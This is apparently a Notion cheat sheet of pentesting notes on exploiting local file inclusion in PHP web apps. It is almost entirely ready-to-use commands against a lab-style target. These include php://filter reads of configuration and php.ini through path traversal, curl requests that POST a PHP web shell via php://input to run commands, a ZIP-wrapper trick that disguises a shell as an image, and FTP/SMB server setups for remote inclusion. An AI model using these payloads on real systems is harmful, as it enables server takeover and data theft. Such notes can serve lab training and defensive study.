LFI | Notion

PHP Filters

php://filter/read=convert.base64-encode/resource=config

Pull php.ini

You should fuzz for version numbers

<http://83.136.253.251:41973/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini>

Curl for data filter

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid

Curl INPUT filter (POST)

url -s -X POST --data '<?php system($_GET["cmd"]); ?>' "<http://83.136.253.251:41973/index.php?language=php://input&cmd=INSERT_COMMAND_HERE>" > test.html

Start FTP Server

python -m pyftpdlib -p 21

Impacket SMB Server

impacket-smbserver -smb2support share $(pwd)

Simple Command input PHP

<?php system($_GET["cmd"]); ?>

ZIP Bypass

echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id

PHAR

Create Phar